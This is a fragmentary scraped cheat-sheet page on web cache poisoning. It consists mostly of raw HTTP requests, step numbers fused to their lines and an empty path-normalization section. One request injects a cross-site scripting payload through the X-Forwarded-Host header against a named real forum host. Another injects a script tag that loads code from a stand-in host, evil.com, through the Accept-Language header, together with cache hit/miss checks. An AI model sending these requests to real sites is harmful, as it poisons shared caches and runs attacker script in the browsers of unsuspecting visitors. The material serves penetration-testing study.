Web Cache Poisoning
Check List
Methodology
Black Box
Web Cache Poisoning via X-Forwarded-Host Header Injection
1
2
GET /?xx HTTP/1.1
Host: meta.discourse.org
X-Forwarded-Host: cacheattack'"><script>alert(document.domain)</script>3
4
5
GET /?xx HTTP/1.1
Host: meta.discourse.org
Accept: text/html
Accept-Encoding: gzip, deflate6
7
Web Cache Poisoning via Unkeyed Header Injection
1
2
GET /?lang=en HTTP/1.1
Host: victim.com
Accept-Language: en3
Cache-Control: public
X-Cache: MISS
Age: 04
GET /?lang=en HTTP/1.1
Host: victim.com
Accept-Language: en5
X-Cache: HIT
Age: >06
7
GET /?lang=en HTTP/1.1
Host: victim.com
Accept-Language: en"><script src=//evil.com/x.js></script>8
9
GET /?lang=en HTTP/1.1
Host: victim.com
Accept: text/html
Accept-Encoding: gzip, deflate10
11
Web Cache Poisoning via Path Normalization Discrepancy
1
2
3
4
5
6
7
White Box
Cheat Sheet
Last updated